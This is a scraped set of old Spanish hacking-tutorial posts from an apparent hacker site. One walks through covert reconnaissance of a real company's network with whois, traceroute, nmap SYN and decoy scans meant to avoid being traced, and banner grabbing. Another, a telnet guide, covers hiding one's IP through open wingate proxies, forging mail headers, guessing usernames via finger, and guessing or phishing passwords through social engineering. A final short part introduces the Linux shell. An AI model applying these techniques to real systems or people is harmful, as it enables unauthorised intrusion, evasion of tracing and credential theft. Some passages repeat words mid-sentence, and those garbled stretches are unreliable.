295 Lafayette St- 3rd Fl
NY, NY 10012

Netname: GLOBIXBLK3
Netblock: 209.10.0.0 – 209.11.159.255
Maintainer: PFMC

Coordinator:
Hostmaster, Globix Corporation (GCH2-ARIN) arin-admin@GLOBIX.NET
212.334.8500 (FAX) 212.334.8615

Domain System inverse mapping provided by:

Z1.NS.NYC1.GLOBIX.NET 209.10.66.55
Z1.NS.SJC1.GLOBIX.NET 209.10.34.55
Z1.NS.LHR1.GLOBIX.NET 212.111.32.38

ADDRESSES WITHIN THIS BLOCK ARE NON-PORTABLE

Record last updated on 10-Jul-2000.
Database last updated on 1-Aug-2000 06:07:11 EDT.

The ARIN Registration Services Host contains ONLY Internet
Network Information: Networks, ASN’s, and related POC’s.
Please use the whois server at rs.internic.net for DOMAIN related
Information and whois.nic.mil for NIPRNET Information.

De este modo hemos sabido que la red global es GLOBIXBLK3 de Globix
Corporation y que va desde la IP 209.10.0.0 hasta la
209.11.159.255. Tambien se nos ofrecen datos acerca del Coordinador
que muy bien podrian servir para ciertas tecnicas de ingenieria social
.

Ahora no vendria nada mal determinar algo de la topologia rutas de
acceso potencial de la red. Con el programa traceroute podemos
descubrir la secuencia de hosts hasta llegar al objetivo e identificar
dispositivos de control de acceso como routers o cortafuegos.

$> traceroute transmeta.com

1 SEVI-X9.red.retevision.es (62.81.56.41) 138.486 ms 119.613 ms 130.83 ms
2 SEVI-R1.red.retevision.es (62.81.56.28) 139.057 ms SEVI-R3.red.retevision.es (62.81.56.27) 120.209 ms SEVI-R1.red.retevision.es (62.81.56.28) 129.753 ms
3 SEVI-R15.red.retevision.es (62.81.55.229) 120.721 ms 119.941 ms 129.843 ms
4 BARC-R16.red.retevision.es (62.81.125.3) 139.933 ms 139.88 ms 150.833 ms
5 BARC-R0.red.retevision.es (62.81.63.193) 159.007 ms 139.807 ms 149=2E913 ms
6 mi4-retevision-E3-2-es.seabone.net (195.22.192.229) 161.544 ms 159.903 ms 159.887 ms
7 gi-eth-2-mi5.seabone.net (195.22.205.235) 239.99 ms 159.912 ms 159=2E894 ms
8 itmil201-ta-p5-1-0.ebone.net (195.158.241.117) 159.935 ms 149.876 ms 169.88 ms
9 chgen102-tc-p0-1.ebone.net (195.158.241.37) 189.92 ms 169.909 ms 169.884 ms
10 chgen101-tc-p3-0.ebone.net (195.158.237.34) 180.842 ms * 240.1 ms
11 frpar205-tc-p1-0.ebone.net (195.158.228.22) 189.865 ms 178.867 ms 180.005 ms
12 gblon303-tc-p1-0.ebone.net (195.158.228.150) 199.884 ms 199.848 ms 189.897 ms
13 gblon504-tc-p1-0.ebone.net (195.158.232.33) 199.908 ms 199.824 ms 199.944 ms
14 195.158.232.66 (195.158.232.66) 189.855 ms 189.901 ms 199.922 ms
15 pos5-0-0-core2.lhr1.globix.net (209.10.12.197) 189.851 ms * pos2-2-core1.lhr1.globix.net (209.10.12.193) 230.109 ms
16 170.atm0-0-core2.sjc1.globix.net (209.10.11.70) 359.851 ms 146.atm0-0-core2.sjc1.globix.net (209.10.11.46) 369.861 ms 359.918 ms
17 pos5-0-0-aggr1.sjc1.globix.net (209.10.3.30) 359.882 ms 359.847 ms 370.234 ms
18 v2-edge2.sjc1.globix.net (209.10.3.22) 359.627 ms 369.855 ms 359.959 ms
19 www1.transmeta.com (209.10.41.231) 369.915 ms 379.868 ms 369.896 ms

Por fin…Parece ser que el =FAltimo eslabon es el servidor web
www1.transmeta.com(una de las IP de transmeta.com, la otra sera el
gemelo www2.transmeta.com) y el anterior a el podria ser un router
frontera. Para conocer los registros de Mail eXchange (MX), es decir
las maquinas que gestionan el correo de nuestro objetivo existe la
utilidad host. Al hacer

$>host transmeta.com

transmeta.com has address 209.10.41.232
transmeta.com has address 209.10.41.231
transmeta.com mail is handled (pri=3D40) by neosilicon.transmeta.com

obtengo el nombre del sistema que gestiona el correo. Esto es
fundamental porque generalmente en los entornos comerciales el correo
se administra en el mismo sistema que el cortafuegos. Con un nslookup
descubrimos que la IP de neosilicon.transmeta.com es 209.10.217.68.

Bueno. Hasta ahora disponemos de una lista de direcciones Ip de red,
servidores DNS, de correo y otras yerbas…pero =BFsabemos que
sistemas estan activos y accesibles via internet?=BFy que puertos
estan a la escucha? Bien, eso vamos a arreglarlo
inmediatamente. Podriamos hacer barridos ping enviando paquetes ICMP
ECHO(8) para recibir ICMP ECHO REPLY (0) si el destino esta
activo. Mejor que ping es la herramienta fping que “pregunta” en
paralelo y permite barrer rapidamente varias direcciones IP. Fping se
usa mediante shell scripts con la utilidad gping (que viene incluida
en fping) junto con el intervalo de IP, por ejemplo

$>gping 209 10 0 0 254 (equivale a 209.10.0.0-209.10.0.254)

devolvera la IP junto con “is alive” si el host esta activo…pero
vamos a pasar a la utilidad mas interesante para la exploracion que es
nmap (www.insecure.org/nmap. Nmap no es solamente un explorador de
puertos: permite hacer como fping barridos ping y determinar el
sistema operativo por rastreo de pila. Cuando el trafico ICMP se
encuentra bloqueado la exploracion de puertos es la mejor tecnica para
encontrar hosts activos. Nmap permite la opcion de hacer TCP ping scan
mediante la opcion -PT en el puerto 80 (puerto comun usado por los
routers frontera para los sistemas de su misma zona y sus cortafuegos
principales. Y permite analizar toda la red indicada como intervalo,
con “mask” o utilizando bloques CIDR: por ejemplo 209.10.*.* equivale
a 209.10.0-255.0-255 o usando mask, 209.10.0.0/16. Cualquiera de estas
formas vale para usar con nmap. Si usamos la notaci=F3n de mask IP/n
n=3D0 escanea toda internet y n=3D32 el host particular
correspondiente a dicha IP.la mask /24 barrera una serie de IP
correspondiente a x.x.x.0-225 (red de clase C con mascara de subred
255.255.255.0)y /16 lo hara con una serie correspondiente a una clase
B (x.x.0-255.0-255). Para ello hacemos como root

#>nmap -sP -PT80 209.10-11.0-159.0-255

(barremos toda la red global)

y para cada host activo, aparecera “Host (x.x.x.x) appears to be up”.

Las opciones y posibilidades de nmap son grandes; conviene leerse el
manual porque aqui solamente trataremos un nivel muy muy
basico. Podemos realizar una exploracion de puertos sigilosa mediante
un barrido semi abierto (TCP SYN scan) realizado como superusuario:

#>nmap -sS transmeta.com

(los resultados pueden almacenarse en un fichero con la opcion -o
fichero)

# Nmap (V. nmap) scan initiated 2.53 as: nmap -sS transmeta.com
Interesting ports on www1.transmeta.com (209.10.41.231):
(The 1521 ports scanned but not shown below are in state: closed)
Port State Service
22/tcp open ssh
80/tcp open http

# Nmap run completed at Tue Aug 1 23:17:52 2000 — 1 IP address (1 host up) scanned in 28 seconds

Como puede verse www1.transmeta.com solamente tiene dos puertos
abiertos, el de secure shell y el de servidor web.

Para que la exploracion sea todavia mas silenciosa conviene hacer el
barrido utilizando se=F1uelos con la opcion -D. Supongamos que estamos
interesados especificamente en una direccion x.x.x.x y en los puertos
25, 139 y 443. Podemos hacer

#>nmap -sS x.x.x.x -D se=F1uelo1, se=F1uelo2, ME -p25, 139, 443

De este modo se realiza un barrido SYN en tales puertos con dos host se=F1uelos 1 y 2. Asi el host escaneado pensara que esta siendo barrido ademas por dichos se=F1uelos. Hay que separar cada maquina se=F1uelo por comas y se puede usar “ME” como se=F1uelo que representa la posicion usada por nuestra maquina. Si se coloca ME en la sexta posicion o superior podemos estar casi seguros que no nos rastrearan, pero los hosts usados como se=F1uelos (en este ultimo caso del 1 al 5) han de estar activos porque si no podria producirse un SYN flooding en la maquina escaneada ademas de no ser notados tales se=F1uelos. Si usamos la opcion -I (ident) podemos conocer el nombre del usuario propietario del proceso conectado via TCP, pero para ello hay que hacer la conexion completa TCP (-sT) y seriamos vistos.

Una vez que conocemos los puntos a la escucha en nuestro sistema
destino, el siguiente objetivo es identificar su sistema operativo. El
procedimiento mas comun es mediante telnet al puerto 23; p.ej.

$> telnet 163.143.103.12
=2E…algunos mensajes tipicos….
HP-UX hpux B.10.01 A 9000/715 (ttyp2)
login:

El problema es que muchos administradores eliminan el banner del
sistema operativo, ciertos sistemas dan per se poca informacion y
algunos listillos mienten como bellacos en el banner. De todos modos
aunque el banner este off es posible usar otras argucias con telnet o
netcat

$>telnet ftp.netscape.com 21
=2E…mensajes….
220 ftp29 FTP server (Unix System V Release 4.0)
(entonces hacemos)
SYST
(y nos aparece si hay suerte)
215 UNIX Type: L8 Version: SUNOS

En el caso de web servers con la utilidad netcat (la navaja del
ejercito suizo para estas cuestiones) podemos hacer (p.ej., en
hotbot.com)

$>echo ‘GET / HTTP/1.0n’ | nc hotbot.com 80 | egrep ‘^Server:’
(para obtener)
Server: Microsoft-IIS/4.0

Pero, por las otras razones, el procedimiento mas preciso es el
llamado rastreo de pila (Stack fingerprinting). A la hora de escribir
las pilas TCP/IP, cada fabricante suele interpretar a su manera la
normativa RFC especifica y mediante la deteccion de estas diferencias
se pueden realizar suposiciones razonables del sistema operativo. Para
que la fiabilidad sea maxima debe al menos existir un puerto
abierto. Hay dos utilidades que permiten realizar esto y son el ya
celebrado programa nmap y queso. Nmap lo realiza con la opcion -O e
incluso si no hay puertos a la escucha realiza una suposicion del
sistema operativo. Queso hace la deteccion basandose en un unico
puerto que por defecto es el 80, pero que puede cambiarse. Por
ejemplo, parece que v2-edge2.sjc1.globix.net (209.10.3.22) como vimos
al hacet traceroute a transmeta.com, es un router. =BFCual sera el
sistema operativo? Para ello basta con hacer #>nmap -O 209.10.3.22 (o
con la opcion -sS para no ser detectados) y en mi caso no se
encontraron puertos abiertos pero la suposicion del sistema operativo
fue en todos los casos un Cisco Router.

=BFOs acordais del gestor de correo de transmeta.com? Se trataba de
neosilicon.transmeta.com (209.10.217.68) y pensabamos que se trataba
de un posible cortafuegosSi hago #>nmap -sS -O 209.10.217.68 tarda un
monton, pero se observa que tiene abiertos los puertos 25 (gestor de
correo, 21 (servidor ftp) y 53 (domain, consulta de DNS). Si hacemos
la consulta a las bravas con #>nmap -O 209.10.217.68 -p25 nos sale un
Linux 2.0.x y si lo hacemos con #>queso 209.10.217.68:25 nos sale lo
mismo.

Cabria decir que neosilicon.transmeta.com se encarga del correo y el
ftp de transmeta.com. Si nos atrevemos a hacer un telnet a esos
puertos nos sale:

$>telnet 209.10.217.68 25
=2E…mensajes….
220 neosilicon.transmeta.com ESMTP Sendmail 8.9.3 …

$>telnet 209.10.217.68 21
=2E…mensajes intimidatorios….
220 neosilicon transmeta.com FTP Server (Version wu-2.6.1(1)) ready…

Y basta por esta entrega.

En el capitulo 2 trataremos de obtener informacion critica del sistema
objetivo: transferencia de zona en DNS, busqueda de cortafuegos y
routers con hping, nmap y netcat, exportacion de archivos NFS,
exportacion de listas de usuarios, aplicaciones RPC, NIS y bugs de los
demonios escuchantes en los puertos tipicos smpt, pop, imap…

Tened cuidado ahi fuera

LECTER

No related posts.

Related posts brought to you by Yet Another Related Posts Plugin.

Guia de Telnet

Sldn — Fri, 15 Jun 2001 22:08:10 +0000

#####################################
## HACKINDEX ##
## http://www.hackindex.org ##
#####################################
Titulo: Guía de telnet
Autor: Seldon
Tema: Protocología

La información incluída en este documento es expuesta en base a un interés educativo. HackIndex no se hace responsable del uso de dicha información.

1. PREFACIO

2. PEQUEÑA INTRODUCCIÓN A LOS PUERTOS

3. FTP

3.a Teoría
3.b Comandos
3.c Práctica

4. TELNET

4.a Teoría
4.b Práctica

5. ENVÍO DE CORREO ELECTRÓNICO (SMTP)

5.a Práctica
5.b Remailers anónimos

6. OTRAS CUESTIONES DE INTERÉS

6.a. Otros puertos interesantes

*****************************************************************

1.-PREFACIO

Esto es una pequeña guía para ayudar a los más nuevos (newbies) a poder seguir sin muchas dificultades las siguientes lecciones del FOR YOU a poder seguir sin muchas dificultades las siguientes lecciones de proyecto HackIndex. No es en ningún caso un manual de hacking, los servicios a los que accederemos aquí son accesibles para todo el mundo, no sólo para hackers

Si después de leer esto tienes dudas, vuélvetelo a leer. Si sigues teniendo dudas, pregúntalas en la lista, no a mi dirección de e-mail. Todos ganaremos si las dudas son respondidas en la lista, además de servir para corregir o añadir algo al texto.

*****************************************************************

2.- PEQUEÑA INTRODUCCIÓN A LOS PUERTOS

Un puerto lógico es en parte similar a un puerto físico (eso que hay detrás de la caja del ordenador, donde conectamos la impresora, el ratón, el módem…). Detrás de cada puerto hay un programa, que da un servicio a todo aquel que se conecte a él y tenga permiso para acceder al servicio.

Para que sea accesible, el puerto debe estar ‘abierto’. Además, debe tener un programa detrás de él, porque si no, aunque nos conectemos, no podremos hacer nada con él. Para saber qué puertos están abiertos debemos usar un scaner. Puedes encontrar algunos muy buenos en http://hello.to/nbk/ y http://www.geocities.com/crino1p/ )))

Hay miles de listas muy completas con todos los puertos. Ahí abajo incluyo una para mayor comodidad, con los puertos más comunes y/o más importantes.

En la lista se asume que cada puerto está relacioque cada puerto está relacionado con su número asociado (ftp con el 21, smtp con el 25, etc…), pero nada impide que podamos intercambiar estos números (poner el ftp en el 1234, p.e.). También recordar que a la hora de conectar con un puerto da igual poner su número que su nombre (‘telnet www.servidor.com 21′ es equivalente a ‘telnet www.servidor.com ftp’)

Y aquí está la lista:

Puerto Servicio Descripción

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

7 echo Lo que teclees se volvera a escribir

9 discard dev/null – basura

11 systat Informacion sobre los usuarios

13 date Hora y fecha en el host remoto

15 netstat Informacion sobre la red

21 ftp Transferencia de ficheros

23 telnet Acceso al shell

25 smtp Correo saliente

37 time Hora en el host remoto

39 rlp Localizacion del recurso

43 whois Informacion sobre la red y el host

53 domain Nombre del servidor

70 gopher Buscador de informacion (ya anticuado)

79 finger Informacion sobre los usuarios

80 www Servidor de Web

110 pop3 Correo entrante

119 nntp Grupos de noticias (news)

139 nbsession Netbios session

443 shttp Servidor de Web ‘seguro’

512 biff Notificacion de correo

513 rlogin Login remoto

514 shell Comando remoto

515 spooler Impresoras UNIX

520 route Protocolo de informacion sobre routing

8000 http Otro servidor de web.

8080 proxy

*****************************************************************

3.- FTP

3.a Teoría

FTP significa File Transfer Protocol, protocolo de transferencia de archivos, en castellano. Y sirve, cómo no, para ésto mismo, transferir ficheros: o de nuestra máquina hacia la máquina remota (upload o subir archivos) o de la máquina remota hacia la nuestra (download o bajar archivos).

También permite seguir bajandose un archivo después de un corte de conexión (por haberse cortado o por ser un archivo muy grande que queremos bajar en varias sesiones)

Un programa de FTP servidor suele abrir el puerto 21 en la máquina en la que está instalado, para que se puedan conectar por él otras máquinas. Un programa de FTP cliente es el que se utiliza para conectarnos al servidor. Los hay gráficos, como el FileZilla para Windows o el IglooFTP para Linux, y en modo texto, que están incluídos en ambos sistemas operativos (para arrancarlos, escribir el comando ftp en una ventana de MS-DOS o de la consola de texto, en Windows y Linux respectivamente). Aquí nos centraremos en los programas clientes de texto.

El FTP no está diseñado para ejecutar programas, para eso está telnet (ver más abajo), pero sí se pueden ejecutar algunos, los que sirven para poder decirle a la máquina que queremos subir o bajar algún archivo o para navegar entre los directorios.

Hay varios modos de transferencia de ficheros: ASCII y binarios. Los ficheros ASCII son los archivos de texto, y los binarios todos los demás (programas, imágenes…). Si transferimos un fichero de texto como binario, seguramente se perderá el formato del archivo (aparecerán símbolos extraños o saltos de línea donde no deberían haberlos), pero no será excesivamente grave.

Sin embargo, si transferimos un binario como texto, es casi seguro que quede inutilizable. Por eso es importante asegurarse de cambiar el modo antes de bajarse un programa, una imagen o un archivo de sonido. Luego, a menos que queramos bajarnos otro archivo, debemos cambiar nuevamente al modo ASCII para poder recibir correctamente la lista de archivos de un directorio (al hacer ls). Normalmente no deberemos preocuparnos por esto si utilizamos un programa de ftp, aunque sea en modo texto. Pero si nos conectamos mediante un programa de telnet sí lo tendremos que tener en cuenta.

3.b Comandos

Nota: Estos son los comandos más importantes del ftp texto para Linux. Los del ftp texto parinux. Los del ftp texto para ms-dos son iguales en su mayor parte, así que no creo que haya ningún problema en encontrar los comandos equivalentes. Para información sobre los comandos que no he incluído aquí, escribir el comando ‘man ftp’

ascii = cambia a modo ASCII (por defecto)

binary = cambia a modo binario

bye = quit = exit = ¡adiós!

cd = Cambio Directorio (¡ojo! no sirve poner ‘cd..’ como en DOS, hay que poner ‘cd ..’ (con espacio)

cdup = igual a ‘cd ..’

close = disconnect = corta la conexión sin salir del programa

delete = borra un archivo en la máquina remota

dir = muestra la lista de archivos del directorio actual. No admite parámetros.

get [archivo.arc] = descargarse el archivo.arc. ¡Ojo! Fíjate de que estás en el modo adecuado antes de descargarlo.

lcd = sin nada más, muestra el directorio local actual. Con un directorio, cambia el directorio local a ese directorio (en el directorio local se guardarán los archivos descargados, y de él se cojerán los que se suban)

ls = muestra los archivos del directorio actual. Los parámetros son los mismos que los del ls del s.o.

mkdir = crea un directorio en la máquina remota.

open = abre una conexión. Sólo es necesario si no ha sido especificado

un sitio en la llamada al programa (como por ejemplo, ftp ftp.rediris.es)

proxy = Se conecta a otro sitio sin desconectar del primero.

put = sube un archivo

rename = renombra un archivo/directorio — ¡Esto puede resultar muy interesante a veces!

reget = seguir bajándose un archivo que ha sido cortado anteriormente.

rmdir = borra un directorio, siempre que esté vacío (aunque algunos parezca que lo estén porque no vemos nada al hacer un ls, lo que pasa es que tienen archivos para los que no tenemos permiso de lectura (si no sabes lo que es esto, lee un manual básico de UNIX)).

mdelete, mdir, mget, mls = lo mismo que esos comandos sin m, pero para varios archivos / directorios

3.c Práctica

Vamos a subir nuestra página web al servidor, para ponerla en internet. Nuestra página principal se llama index.html, y contiene una imagen llamada imagen.jpg, que la queremos poner en un directorio aparte (imágenes).

Pues primero nos conectamos a nuestro servidor. Esto se hace poniendo el comando ‘ftp (servidor)’. Debes sustituir (servidor) por el nombre de tu servidor, por ejemplo ftp.example.com. Por defecto se asume que el puerto es el 21, si fuera otro tedrías que indicárselo. Por ejemplo, si usa el puerto 4000,tendrías que poner ‘ftp ftp.servidor.es 4000′.

Ahora nos saldrá un prompt que nos pedirá un login (username). Le ponemos nuestro nombre de usuario. Si quisiéramos conectarnos anónimamente tendríamos que poner ‘anonymous’ (esto es así para la mayoría de servidores.

Puede, no obstante, que te encuentres algunnte, que te encuentres alguno que no sea así. En estos casos hay que probar con ‘guest’ o similares). Como este no es el caso, introducimos nuestro nombre de usuario, por ejemplo, seldon.

Luego nos pedirá una contraseña. Si hemos entrado como ‘anonymous’ tendremos que poner una dirección de e-mail. Poniendo ‘guest@’ ya vale en la mayor parte de los casos. También puedes poner tu verdadera dirección si quieres que te acaben de mandar por correo los archivos que no te has podido bajar (el servidor debe aceptar esta opción). Si hemos entrado como usuario no anónimo, introduciremos nuestra contraseña.

¡Y ya estamos dentro!, ahora podemos ver nuestros directorios. Si ponemos ‘cd ..’ veremos que estamos en el directorio raíz. Esto no es así en realidad, para la máquina no es el nuestro el directorio raíz, sólo lo es para un usuario (nosotros).

Si ponemos ‘ls’ podremos ver los archivos que hayamos puesto anteriormente nosotros ahí. También veremos varios subdirectorios. Uno de ellos es bin, otro sbin. Si miramos dentro de estos subdirectorios veremos que, aparentemente, están vacíos, pero no es así, lo que pasa es que están llenos de archivos para los que no tenemos permisos de lectura (pero sí de ejecución). Si no sabes qué quiere decir esto, te recomiendo que mires la sección de permisos de un manual básico de UNIX.

Estos subdirectorios no se pueden borrar, porque contienenborrar, porque contienen archivos de los que no somos los propietarios, pero sí renombrar

Bueno, a lo que íbamos. Aquí está el resto del trabajo. No creo que necesite más explicación que la que ya tiene entre los símbolos /* y */.

lcd /mipagina /*cambia el directorio local actual a /mipagina, que es donde se supone que tenemos guardada la página. Los usuarios de windows tendrán que usar la barra invertida ‘\’*/

put index.html /*sube el archivo index.html. Como los html son archivos de texto no hace falta cambiar el modo. Si tuvieras problemas, cambia al modo binary*/

mkdir imagenes

cd imagenes /*crea el subdirectorio imagenes y se cambia a él (todo en la máquina remota*/

binary /*cambia a modo binario (vamos a subir la imagen) (esto no es necesario si usamos un programa de ftp, sí lo es si no lo usamos)*/

put imagen.jpg

ascii /*vuelve a cambiar al modo ascii (porque vamos a comprobar que todo está bien, y necesitamos recibir la información en modo texto (ascii)) (esto no es necesario si usamos un programa de ftp, sí lo es si no lo usamos)*/

ls /*comprueba que la imagen está en su sitio*/

quit /*salimos*/

*********************************************************

4.- TELNET

4.a Teoría

Primero creo que hay que distinguir entre un programa de telnet y el protocolo telnet. Un programa cliente de telnet es un emulador de terminal (teclado + monitor) con el que nos podremos conectar con nuestro ordenador a otro y utilizarlo como si nuestro programa fuera un terminal de la máquina lejana. Es decir, es el que nos permitirá conectar a cualquiera de los puertos abiertos de un sistema para aprovecharnos de sus servicios. Prácticamente todos los s.o. traen uno. Tanto en Linux como en win se llaman igual: telnet.

También hay otros programas que hacen eso. Uno de los más conocidos es el CRT (para win), que podréis encontrar en shareware.com, entre otros muchos lugares.

Y el protocolo telnet es un protocolo orientado a ejecutar programas en una máquina remota. Nosotros le enviamos la información al programa de la máquina lejana mediante el teclado, el programa la procesa en la máquina lejana, y recibimos el resultado en nuestra pantalla. Es decir, este protocolo está orientado a la ejecución de programas en la máquina lejana.

¿Y cómo más podemos utilizarlo? Pues nos puede servir para encontrar y utilizar un proxy con el que anonimizarnos más.

4.b Práctica

Si queréis ver una muestra de cómo se pueden ejecutar programas en una máquina lejana, podéis probar con éstos:

eucmvx.sim.ucm.es (login: biblioteca) <– Catálogo de la universidad complutense de Madrid

babel.uab.es — Catálogo de la universidad autónoma de Barcelona

chess.unix-ag.uni-kl.de (puerto: 5000) <– Jugl.de (puerto: 5000) <– Jugar al ajedrez contra otros usuarios

Para conectar con ellos en Linux debéis escribir ‘telnet servidor’ si se usa el puerto 23 (los que no he puesto nada) o ‘telnet servidor puerto’ si se usa otro puerto diferente. P.e.: ‘telnet babel.uab.es’ ó ‘telnet babel.uab.es 23′

En windows, iniciad vuestro programa de telnet preferido, y en el menú de conexión escribid el nombre y el puerto (dejad telnet si es el 23). Dejad el tipo de terminal en vt-100. Si no veis lo que escribís, habilitad el eco (estará en el cuadro de opciones o similar)

Para utilizar un proxy wingate para anonimizarnos, primero tendremos que conseguir una lista de posibles proxys conectables. Para ello, vamos al IRC y escribimos ‘/raw stats glines’. Esto nos dará una lista de gente que ha sido baneada. Nos quedaremos con los que en el motivo de ban ponga algo de ‘proxy abierto’ o similar. Nos vamos al programa de telnet y probamos con uno.

Si no nos deja conectar, o no dice nada al conectar, pasamos al siguiente. Si nos contesta con el prompt ‘wingate>’, ¡felicidades! has encontrado un wingate.

Con él podrás conectarte a otro sitio sin dejar tu verdadera IP (quedará guardada en el sitio de la conexión la IP del wingate, y la tuya quedará reflejada en el wingate).

Hay algunos wingates que no guardan logs (archivos en los que quedan reflejadas todas las conexiones). Éstos das las conexiones). Éstos son los que deberemos conseguir encontrar. El problema es que no hay forma de saber si un sitio guarda o no logs. Por eso es conveniente conectarse a dos o más consecutivamente. Con esto aumentan las posibilidades de encontrarse uno que no guarde logs, aunque la velocidad disminuye.

Una vez conectado a un wingate, para conectarnos a otro o a cualquier otra parte tendremos que poner ‘open servidor puerto’.

*****************************************************************

5.- SMPT (envío de e-mails)

5.a Práctica

Creo que lo mejor para ver cómo funciona el envío de e-mails es enviandolos ‘a mano’.

Para esto abriremos nuestro programa de telnet, y conectaremos con nuestro servidor de smtp, que estará en el puerto 25. P.e.: telnet smtp.wanadoo.es 25

Después de los mensajes de bienvenida, y para enviar un mail, escribimos:

mail from: Nadie , o bien:

mail from: nadie@ningunsitio.com

La diferencia es que en el primer caso saldrá en el programa de correo empleado para leer nuestro mail que ha sido enviado por Nadie, mientras que en el segundo caso habrá sido enviado por nadie@ningunsitio.com.

Hay algunos servidores que requieren que el servidor que hay detrás de la @ exista. En ese caso basta con poner un servidor que exista (no necesariamente nuestue exista (no necesariamente nuestro )

Para designar el receptor:

rcpt

to: Amigo (rcpt significa recipient)

Ahora viene el cuerpo del mensaje. Le decimos al servidor que queremos introducirlo escribiendo:

data

Si no ponemos nada, la primera línea será el subject, luego tendremos que dejar una línea en blanco, y el resto el cuerpo del mensaje. Finalizaremos con un puntito sólo en una línea.

Pero también podemos poner nuestras propias cabeceras. Como las únicas obligatorias son el from, el to, y el Received (que lo pone el servidor y no podemos modificar), las demás nos las podemos inventar, o copiar de las que ponen los programas de correo. Esto incluye, entre otras, la fecha. Seguramente el servidor la incluirá por otro lado, pero puede ayudar a sembrar la confusión . La última que debemos poner debe ser el subject: , y a partir de esa ya vendrá el mensaje.

5.b Remailer anónimos

Son los servidores de correo saliente que no incluyen la IP del que la envía. Podemos saber si un servidor es o no un remailer anónimo con el comando helo. Ponemos:

helo cualquiercosa

Si nos contesta con:

Helo (nuestronombreenlared) [(nuestraip)] please to meet you.

ya nos podemos olvidar, porque no es un remailer anónimo. Si en la contestación no se incluye nuestra IP, seguramente sí lo será. Podemra IP, seguramente sí lo será. Podemos comprobarlo enviando un mensaje y comprobando si la incluye.

El comando helo es conveniente utilizarlo al conectar a un servidor smtp. No es necesario, pero si no lo usamos en las cabeceras del mensaje se incluirá un warning (advertencia) de que somos unos maleducados que no saludamos .

También se llama remailer anónimo a cierto servicio en la red, al que nosotros dirigimos nuestros mensajes, y ellos eliminan el campo From y lo redirigen al receptor original.

Ninguno de estos dos sistemas es completamente anónimo, ya que si hacemos alguna ‘guarrerida’ y a los MIG les da por investigar, como nuestra entrada en estos servidores ha quedado registrada, no tendrán mucha dificultad para seguir el rastro.

********************************************************

6.- OTRAS CUESTIONES DE INTERÉS

-¿Cómo podemos hacer todo esto off-line?

Pues teniendo instalados los programas servidores de cada servicio.

No sé qué programas hay para windows, ni su utilización, así que no me voy a meter ahí. Lo que sí tenéis que tener en cuenta es que estos programas son comerciales, con lo que tendréis que comprarlos (y no serán baratos precisamente) o conseguirlos de otra forma (no diré cuál XDDD )

En linux lo tenemos muchísimo más fácil, ya que casi todos los programas necesarios son gratuitos, y se suelen inos son gratuitos, y se suelen incluir e instalar por defecto en la mayoría de las distribuciones. Además, son los programas usados mayoritariamente en internet, como el servidor web Apache, el servidor smtp Sendmail, el servidor de news Leafnode o el servidor ftp wu-ftpd.

Si los tenemos instalados y configurados correctamente (consulta las páginas de manual y los how-to adecuados a cada caso), debemos asegurarnos de que su puerto está abierto. Los servicios ofrecidos están en el archivo /etc/inetd.conf. Descomentamos (quitamos el símbolo # de delante) las líneas referidas al servicio que queramos ofrecer, y lo reiniciamos poniendo ‘/sbin/init.d/inetd restart’ (en el caso de la distribución suse. Para otras distribuciones podemos consultar las primeras líneas del archivo en busca del comando a utilizar, y, si no lo encontramos, con el comando find buscar el archivo inetd (find / -name inetd) y scribir el directorio equivalente a /sbin/init.d).

Si lo hemos hecho correctamente, ya nos podremos conectar con nosotros mismo, poniendo como servidor ‘localhost’, p.e.: telnet localhost 25, para practicar con el sendmail.

6.a Otros puertos de interés

-Netstat

Uso: netstat (servidor)

Nos da mucha información sobre las conexiones del sistema, y puertos ‘listening’ (puertos abiertos y escuchando, que nos pueden ahorrar un escaneo de puertos). La función de este puertos). La función de este puerto es la de hacer estadísticas sobre la red.

-Systat

Uso: telnet (servidor) systat

Nos da información sobre los procesos que se están ejecutando en la máquina remota. Con esta información podemos, entre otras cosas, buscar exploits para estos programas

-Finger

Uso: telnet (servidor) (usuario)

Nos da información sobre los usuarios de un sistema. Sin el parámetro usuario nos mostrará todos los que haya conectados en ese momento (no es normal que lo haga a menos que seas root). La información que da es:

nombre completo del usuario

directorio personal

shell que utiliza

última conexión (o si está conectado o si nunca se ha conectado) y desde dónde si tiene correo por leer

Si no te da la lista de usuarios conectados sin dar nombre, además de probar el finger con el root para ver sobre todo cuándo se conecta, puedes probar ‘a ciegas’. Si están en una máquina española puedes probar con logins como juan, jose, pedro, jlopez… y en una máquina americana con logins como john, mike, smith… Es casi seguro que hay algún usuario llamado así. ¡Ten en cuenta la nacionalidad del servidor, no vayas a probar jose en un servidor japonés!

Con esta información podemos intentar adivinar una contraseña, teniendo en cuenta que la mayoría de la gente no quiere con la mayoría de la gente no quiere contraseñas difíciles de recordar, y usa una combinación de su nombre y sus apellidos. También puede servir para enviarle un mail a su nombre verdadero pasando por ser el administrador del sistema, intentando convencerle de que te dé su contraseña (esto se llama ingeniería social ).

También puedes ser más sutil, e intentar sacarle su fecha de nacimiento, o la fecha de su boda, o el nombre de sus hijos o de su pareja, o cosas similares que suelen ser muy utilizadas como contraseña.

Y bueno, esto ha sido todo. Espero no haberos aburrido mucho.

No related posts.

Related posts brought to you by Yet Another Related Posts Plugin.

La Pantalla Negra II

Lokutus — Fri, 15 Jun 2001 22:07:11 +0000

#####################################
## HACKINDEX ##
## http://www.hackindex.org ##
#####################################
Titulo: La pantalla negra II
Autor: Lokutus
Tema: Linux

La información incluída en este documento es expuesta en base a un interés educativo. HackIndex no se hace responsable del uso de dicha información.

Volvemos a enfrentarnos una vez más con el dragón.

Linux Debian (Potatoe)
Login: genaro
password:
[genaro]$ _

Vamos a introducir algunas órdenes, para familiarizarnos un poco con el shell que estamos utilizando,

[genaro]$ ls
[genaro]$ pwd
/home/genaro
[genaro]$ _

Estas órdenes ya las vimos en la primera parte, si queremos repetir en cualquier otro momento algunas de las órdenes, no hace falta teclearlas de nuevo, usando las flecha de cursor arriba, podemos repetir órdenes que ya hemos tecleado anteriormente, e incluso editarlas.

Sigamos metiendo órdenes, crear directorios, borrarlos, crear ficheros, etc. Llegará un momento, en que el texto desaparezca por la parte superior de la pantalla. La consola, sólo tiene 80 columnas de ancho y 25 líneas de alto, para ver una línea que haya desaparecido, podemos usar la combinación de teclas "Mayúsculas + Retroceso de página" para ir arriba y "Mayúsculas + Avance de página" para ir hacia abajo. Si lo deseamos, podemos ejecutar dos o más órdenes en una misma línea separandolas con el punto y coma, ";"

[genaro]$ mkdir directorio ; ls ; cd directorio ; pwd
directorio
/home/genaro/directorio
[directorio]$ _

